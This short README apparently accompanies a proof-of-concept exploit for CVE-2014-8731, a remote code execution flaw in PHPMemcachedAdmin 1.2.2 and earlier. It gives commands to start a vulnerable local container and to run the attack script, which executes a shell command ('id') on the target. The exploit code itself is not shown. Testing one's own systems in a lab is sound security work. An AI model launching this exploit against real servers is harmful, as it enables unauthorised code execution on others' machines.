A proof of concept tool to test your own system if they are vulnerable to CVE-2014-8731
PHPMemcachedAdmin Remote Code Execution - CVE-2014-8731 PoC
Start victim server:
docker run -p8081:80 --rm --name phpma -it alphayax/phpmemcachedadmin
Attack victim with PoC:
git clone https://github.com/sbani/CVE-2014-8731-PoC.git
cd CVE-2014-8731-PoC
python attack.py http://localhost:8081 id
PHPMemcachedAdmin 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via vectors related "serialized data and the last part of the concatenated filename," which creates a file in webroot.
References: